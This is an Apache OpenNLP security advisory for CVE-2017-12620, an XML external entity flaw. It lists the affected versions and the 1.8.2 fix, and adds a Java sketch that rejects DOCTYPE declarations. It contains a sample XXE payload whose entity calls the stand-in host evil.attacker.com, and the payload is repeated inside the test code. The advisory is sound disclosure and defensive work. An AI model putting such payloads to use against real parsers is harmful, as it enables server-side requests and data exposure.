CVE-2017-12620 - Apache OpenNLP XXE vulnerability

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected:

OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1

Description: When loading models or dictionaries that contain XML, it is possible to perform an XXE (XML External Entity) attack. Since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.

Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.

Example:

To demonstrate this vulnerability, an attacker can place the following inside one of the XML files, either a standalone dictionary or a file embedded inside a model package:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>
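For applications that pre-screen untrusted XML themselves, the following is a minimal sketch of a hardened JAXP parser that rejects any document carrying a DOCTYPE declaration, such as the payload above. It is an illustration only and is not necessarily how OpenNLP 1.8.2 addresses the issue; the class and method names (XxeHardeningSketch, hardenedFactory, rejectsDoctype) are hypothetical, and the disallow-doctype-decl feature is assumed to be supported by the parser in use (it is by the JDK's built-in Xerces-based parser).

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper class; not part of the OpenNLP API.
public class XxeHardeningSketch {

    // Builds a factory that refuses DOCTYPE declarations outright,
    // so external entities are never declared or resolved.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the hardened parser refuses the document,
    // false if the document parses successfully.
    static boolean rejectsDoctype(String xml) {
        try {
            hardenedFactory()
                .newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            // The parser raises a SAXException when it meets the DOCTYPE.
            return true;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException("Parser setup or I/O failed", e);
        }
    }

    public static void main(String[] args) {
        String payload =
            "<?xml version=\"1.0\" ?>\n"
            + "<!DOCTYPE r [\n"
            + "<!ELEMENT r ANY >\n"
            + "<!ENTITY sp SYSTEM \"http://evil.attacker.com/\">\n"
            + "]>\n"
            + "<r>&sp;</r>";
        System.out.println("payload rejected: " + rejectsDoctype(payload));
        System.out.println("plain XML rejected: " + rejectsDoctype("<r>ok</r>"));
    }
}
```

Because the DOCTYPE is refused before any entity is resolved, no request to the attacker-controlled URL should be made. A check like this does not replace the upgrade to 1.8.2, since the affected OpenNLP versions use their own parser configuration when loading models and dictionaries.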

Credit: This issue was discovered by Nishil Shah of Salesforce.

--The Apache OpenNLP Team

02 October 2017